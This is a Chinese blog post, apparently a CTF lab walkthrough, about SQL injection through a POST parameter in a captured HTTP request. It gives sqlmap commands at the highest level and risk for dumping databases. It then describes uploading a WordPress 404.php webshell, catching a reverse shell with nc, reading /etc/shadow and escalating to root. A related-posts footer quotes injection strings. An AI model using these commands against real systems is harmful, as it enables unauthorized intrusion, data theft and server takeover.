SQL注入POST参数-注入HTTP报文

最新推荐文章于 2024-01-17 10:46:48 发布
最新推荐文章于 2024-01-17 10:46:48 发布
阅读量2.2k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FXHQAQ/article/details/103652880
版权

1、SQL注入漏洞介绍

SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。

任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数;

实验环境
攻击机:10.0.2.11
靶场机器:10.0.2.10

2、信息探测

扫描主机开放的全部端口

–nmap -T4 -p- 靶场IP地址

在这里插入图片描述

快速扫描主机全部信息

–nmap -T4 -A -V 靶场IP地址

在这里插入图片描述 在这里插入图片描述 在这里插入图片描述

我们可以发现80端口和8080端口开放的http服务

探测敏感信息

–nikto -host http://靶场IP地址:端口

–dirb http://靶场IP地址:端口

分析扫描的结果80端口

在这里插入图片描述

打开我们发现了一个登录界面

在这里插入图片描述

3、漏洞扫描

漏洞扫描器Owasp-zap

先对默认的80端口进行探测

在这里插入图片描述

未发现高危漏洞

在这里插入图片描述

接着扫描8080端口

扫描8080端口

也未发现高危漏洞

在这里插入图片描述

对登录界面我们想到该页面是否具有对应的SQL注入,可以使我们注入到系统库当中,获取对应的数据

4、漏洞利用

针对web进行漏洞扫描

对扫描的结果进行分析。注意如果具有SQL注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。但扫描结果也不一定正确。

使用sqlmap利用SQL注入漏洞

使用Burpsuite来抓取数据包
在浏览器设置代理为8081端口

在这里插入图片描述在这里插入图片描述在这里插入图片描述

复制返回的数据包

在这里插入图片描述

粘贴数据包进行注入

–sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch

request.raw抓取的数据包头,level 5最高水平,risk 3最高风险,用Mysql的数据库dbms,batch为不再询问,自动补齐。

在这里插入图片描述
在这里插入图片描述

–sqlmap -r request.raw --level 5 --risk 3 -D “数据库名” --tables 查看对应数据库中的数据表 --batch

在这里插入图片描述
在这里插入图片描述

–sqlmap -r request.raw --level 5 --risk 3 -D “数据库名” -T “表名” --columns 查看对应字段 --batch在这里插入图片描述

在这里插入图片描述

–sqlmap -r request.raw --level 5 --risk 3 -D “数据库名” -T “表名” -C “列名” --dump --batch在这里插入图片描述

在这里插入图片描述

打开http://192.168.1.109:8080/wordpress/wp-login.php,进入登陆页面

5、上传webshell获得控制权

wordpress后台寻找上传点

–主题的404.php可以上传webshell
–webshell 获取/usl/share/webshell.php/

在这里插入图片描述

修改对应的webshell,复制保存

在这里插入图片描述

上传webshell

在这里插入图片描述

执行shell,获取反弹shell。

http://靶场IP地址:端口号/目录/wp-content/themes/主题名/404.php

http://192.168.1.109:8080/wordpress/wp-content/themes/twentythirteen/404.php

启动监听

–nc -nlvp port

在这里插入图片描述

启动终端

–python -c “import pty;pty.spawn(’/bin/bash’)”

在这里插入图片描述

6、root权限

–使用 cat etc/shadow查看敏感文件

–使用 cat etc/passwd查看敏感文件

–使用 su - 提升root权限

在提升权限的过程中发现需要密码我们尝试之前发现的用户名密码

在这里插入图片描述

最后成功登入

在这里插入图片描述

总结

只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。

FXHQAQ
关注
CTF练习:SQL注入post参数http报文注入
qq_43233085的博客
11-25 2581
CTF练习:SQL注入post参数http报文注入环境准备信息收集http报文获取sqlmap注入上传shell脚本进入靶机 靶机地址: 链接: https://pan.baidu.com/s/1zNyLqsxhYxAsl77tTI6agA 提取码: 56kj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75....
sql注入--10http注入
技术骨干小李的博客
07-27 663
**HTTP(HyperText Transfer Protocol,超文本传输协议)**是访问万维网使用的核心通信协议,也是今天所有Web应用程序使用的通信协议。最初,HTTP只是一个为获取基于文本的静态资源而开发的简单协议,后来人们以各种形式扩展和利用它.使其能够支持如今常见的复杂分布式应用程序。HTTP使用一种用于消息的模型:客户端送出一条请求消息,而后由服务器返回一条响应消息。该协议基本上不需要连接,虽然HTTP使用有状态的TCP协议作为它的传输机制,但每次请求与响应交换都自动完成,并且可能使用不
CTF训练 web安全SQl注入(X-Forwarded-For报文头)
梁辰兴的博客
11-05 549
SQl注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQl语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入点,比如url中,以及http报文中。只要是用户可以输入的位置都是有可能存在注入点的!
一次sql注入攻击
3569
07-20 548
喜欢学习 ,但是不想找漏洞 ,好麻烦 ,还不一定有一个漏洞 ...... 如果文章有什么违规的行为 ,请及时告诉我 ,然后及时删除本文章 .... 网站是我在google上搜到的 ,网站画面看着高大上 ~~~ 一个页面一个页面的找,寻找有输入参数的地方,然后进行测试 ,本来我以为没有注入的时候 突然 ,看到了一小句话 ...
SQL注入
qq_26054303的博客
04-27 304
SQL注入是服务端的安全问题,注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能控制输入, 第二个是原本程序要执行的代码拼接了用户输入的数据。 例如: 正常情况下,用户输入查询条件“上海”时,sql语句是“select * from city where name = ‘上海’”,当用户输入“上海‘;drop table city”,那么 sql语句
DDOS和sql注入网络攻防实验
weixin_34221332的博客
11-15 1774
模拟网络攻防实验 好久没研究渗透攻击了,巩固一下 sql注入攻击 概述 通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。 环境拓扑图 Ip地址 操作机IP地址:172.16.11.2 整体说明 1、第一步,判断注入点字符还是数字 字符型 ' and 'a'=a' ' and 'a'='b 数字型 and 1=1 a...
SQL注入---数值型注入POST
Ethan024的博客
03-22 536
SQL注入—数值型注入POST)(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—数值型注入POST) 实验步骤: 先查询一下下拉框的功能: 查看此时的URL:http://localhost/pikaqiu.cn/vul/sqli/sqli_id.php发现是post方式提交的请求,因为没有使用URL传参。 后端数据库查询逻辑:select name, email from table where id = n(1,2,3,4…) 使用Burpsuite
简学-SQL注入(GET型与POST型)
码农米格的博客
02-14 3535
简学SQL注入0x01 SQL注入原理0x01.1 SQL注入发生的原因0x01.2 SQL注入造成的危害0x02 GET型注入漏洞。0x02.1 对网站进行 SQL注入测试时,首先需要我们找到注入点0x02.2 尝试`UNION`注入是否生效。0x02.3 测试字段的数量成功-通过回显结果替换其中的选项-获去数据库的详细信息0x02.4 成功获取数据库表-发现users表-进行users表结构信息获取0x02.5 根据回显结果替换字段,获取字段中的数据三级目录 0x01 SQL注入原理 什么是SQL
sql注入漏洞
weixin_49472648的博客
04-27 3708
SQL注入漏洞 文章目录SQL注入漏洞一、SQL注入原理实现注入攻击的两个关键条件(重点)二、SQL注入危害三、SQL注入防御四、SQL注入分类五、SQL注入流程流程细节六、手工注入实例1、判断是否存在SQL注入点2、判断注入类型3、判断字段数4、判断回显位置5、判断数据库名6、确定表名7、确定字段名8、获取用户名与密码9、MD5解密—破解密码七、sqlmap注入实例1、判断是否存在注入点2、爆数据库名3、指定库名,列出所有元素4、指定库名、表名,列出所有字段5、指定库名、表名、字段名,列出指定字段 一、S
SQL注入-HTTP Header 基础知识
weixin_54217950的博客
02-18 243
HTTP报文类型 请求报文HTTP Request):由客户端发给服务器的消息,其组成包括请求行Request-Line)、请求头域(Header-Field)和请求体(Entity-Body)。 响应报文HTTP Response):由服务器回复给客户端的消息,其组成包括状态行(Status-Line)、响应头域(Header-Field)和响应体(Entity-Body)。 HTTP请求报文 http组成 请求报文http请求报文由请求行、请求头部、空行和请求报文主体几个部分组成。 HTTP H
SQL注入Post型提交方式的注入--免密登录
weixin_44029504的博客
04-29 1534
Post型提交方式的注入 POST提交,由于不在url中携,所以借助工具burpsuit!!! SQL注入之万能密码 1)sql注入之万能用户名 注释法 //将密码注释掉 eg:用户名处 admin' # or 方法 eg:admin' or '1'='1 2)updata 3)insert—UA 以Less11为实例:实现免密登陆 方法一:使用注释法 1、在页面使用用户名和密码登陆(...
6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文
高冷的宅先生
04-06 730
1.信息探测 #扫描主机开放的全部端口 nmap -T4 -p- 192.168.2.117 #扫描靶场全部信息 nmap -T4 -A -v 192.168.2.117 #探测敏感信息 nikto -host http:// dirb http:// #漏洞扫描 owasp 2.漏洞利用 登录界面 #burpsuite抓包,需要把浏览器设置代理 #在登录界面尝试登录,抓取请求数据包,保存为r...
SQL注入扫描讲解
最新发布
黑战士的博客
01-17 1085
在时间盲注中,如果我们用国内的扫描器扫描国外的网站,可能你正常访问国外的网站,等待的时间都需要10秒,检测脚本中等待的5秒都属于正常的网络抖动,误报率非常高,这种情况下可以先发几个包到需要检测的网站上,计算一个平均访问时间,在平均访问时间上构造盲注时间,这样来提高准确率。水无常形,需要根据情况讨论,如果我们的一个SQL注入脚本,正确的时候,是返回200状态码,失败的时候,返回404状态码,这里的对应。另一种情况,正确的时候,返回个人信息,失败的时候,返回为空,这里的对应。
POST请求小测试(SQL注入
Hala
03-30 2117
进入DVWA1.9,将安全防御设置为中等,进入SQL注入模拟 表单可以GET也可以POST提交,但是网址栏没有变化,可得其为POST提交 可以明显的看出来此页面为POST提交 利用Burp来实现代理,在其上进行SQL注入 步骤如下 判断提交方式 判断闭合符 判断输入列宽度 利用联合查询,查找想要的数据 经判断,此页面为POST提交,因为更改表单元素时,地...
SQL Server 发送Http请求 函数
KingCruel的专栏
03-29 3854
1、开启Sql Server 通讯配置 sp_configure 'show advanced options', 1; go RECONFIGURE; go sp_configure 'Ole Automation Procedures', 1; go RECONFIGURE; go EXEC sp_configure 'Ole Automation Procedures'; go * CREATE proc [dbo].[SP_HTTPRequest] @URI varc
SQL注入POST型常规注入
Jim的博客
08-14 1万+
less11单引号字符型注入 注入:test' or 1=1 #&password=test sql语句:select username, password from users where username='test' or 1=1 #' and password='test' limit 0,1; 注入:uname=test&passwd=test' or '1'='1 sql语句
HTTP POST请求并将请求参数设置成请求体添加到请求中
热门推荐
FreeTourW的博客
05-26 1万+
- (void)post:(NSString *)URL param:(NSDictionary *)param finishBlock:(void (^) (NSURLResponse *response, NSData *data, NSError *connectionError)) block { //网络请求字符串 NSString *urlString = @"";
CTF夺旗训练课程
taozijun的博客
09-04 1万+
第一章 课程介绍与环境搭建 1-2 环境搭建 攻击机统一为kali,直接用ova文件创建靶场机器后,靶场机器要求进行登陆。 可我们并没有用户名和密码。问题是:如果我们不进行登陆,如何获得靶场机器的ip地址?从而达到联通靶场机器的目的. 这里我们使用netdiscover命令 netdiscover -r ip/子网掩码    24为24位二进制数1,就是255.255.255.0。...
一个简单的Httpserver以及获取post提交的参数
dieli4192的博客
12-08 1084
以下代码是我从网上找来的,但是一直获取不到post提交的参数,最后经过我的修改,终于可以得到post提交的数据。因为本人在网上找了很久都没有找到相关的资料,特意发出来希望能帮到大家,有什么不足的地方还请大神们指正,小弟不胜感激。 Httpserver代码 1 public void StartListen() 2 { 3 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值